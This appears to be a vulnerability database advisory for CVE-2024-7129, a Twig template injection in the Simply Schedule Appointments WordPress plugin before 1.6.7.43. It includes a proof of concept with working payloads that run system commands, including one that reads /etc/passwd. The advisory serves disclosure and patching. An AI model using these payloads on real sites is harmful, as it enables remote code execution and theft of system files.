Appointment Booking Calendar < 1.6.7.43 – Admin+ Template Injection to RCE | CVE 2024-7129 | Plugin Vulnerabilities

Description

The plugin does not escape template syntax provided via user input, leading to Twig Template Injection which further exploited can result to remote code Execution by high privilege such as admins

Proof of Concept

With at least one appointment type in the plugin, go to the settings of the plugin, click on the Notifications car, add a new notifications and put one of the payload below in the Message field:

{{7*7}}
${{<%[%'"}}%\
{{['id']|filter('system')}}  
{{['cat\x20/etc/passwd']|filter('system')}}

The payload will be processed in the Live Preview section

Affects Plugins

simply-schedule-appointments

Fixed in 1.6.7.43

References

CVE

Classification

Type

COMMAND INJECTION

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Jeewan Kumar Bhatta

Submitter

Jeewan Kumar Bhatta

Submitter website

https://jeewanbhatta.com.np/

Verified

Yes

WPVDB ID

00ad9b1a-97a5-425f-841e-ea48f72ecda4

Timeline

Publicly Published

2024-08-23 (about 1 year ago)

Added

2024-08-23 (about 1 year ago)

Last Updated

2024-10-01 (about 1 year ago)

Other

Published

Title

Published

2024-11-26

Title

Total Upkeep < 1.16.7 - Authenticated (Administrator+) Remote Code Execution via Backup Settings

Published

2022-10-18

Title

ImageMagick-Engine < 1.7.6 - Command Injection via CSRF

Published

2024-05-09

Title

Unlimited Elements For Elementor (Free Widgets, Addons, Templates) < 1.5.103 - Admin+ Command Injection

Published

2023-12-22

Title

Backup Migration < 1.4.0 - Authenticated (Admin+) OS Command Injection via url

Published

2024-06-24

Title

Insert or Embed Articulate Content into WordPress < 4.3000000024 - Author+ Arbitrary File Upload